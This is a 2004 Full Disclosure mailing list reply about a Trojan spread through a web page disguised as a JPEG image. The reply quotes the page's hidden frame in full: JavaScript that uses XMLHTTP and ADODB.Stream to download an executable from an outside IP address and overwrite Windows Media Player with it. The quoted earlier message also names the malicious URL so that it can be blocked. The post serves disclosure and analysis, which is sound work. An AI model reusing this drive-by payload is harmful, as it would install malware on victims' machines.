Full Disclosure mailing list archives

Re: another Trojan with the ADO hole? + a twist in the story

From: KF <dotslash () snosoft com>
Date: Sat, 31 Jan 2004 13:49:42 -0500

Heres the other frame...

<html><body><img src="1.jpg" width="500" height="400"></body></html>

<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://211.19.46.20/5.exe ",0);x.Send();var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";

</textarea>




Gadi Evron wrote:

The past Trojan horses which spread this way took advantage of the factweb servers send an HTML 404 message if a file doesn't exist.
The original sample - britney.jpg - was simply an html file itself, andusing that fact, and IE loading it. It was combined with one of thelatest exploits of the time (I don't think MS patched it yet), anddownloaded the Trojan horses.
This time around there is actually a picture on the web page, of a realhonest to God girl. But in another frame.. the same story all over again.
For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

    Gadi Evron.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

another Trojan with the ADO hole? + a twist in the story Gadi Evron (Jan 31)
- Re: another Trojan with the ADO hole? + a twist in the story KF (Jan 31)
- Re: another Trojan with the ADO hole? + a twist in the story Paul Schmehl (Jan 31)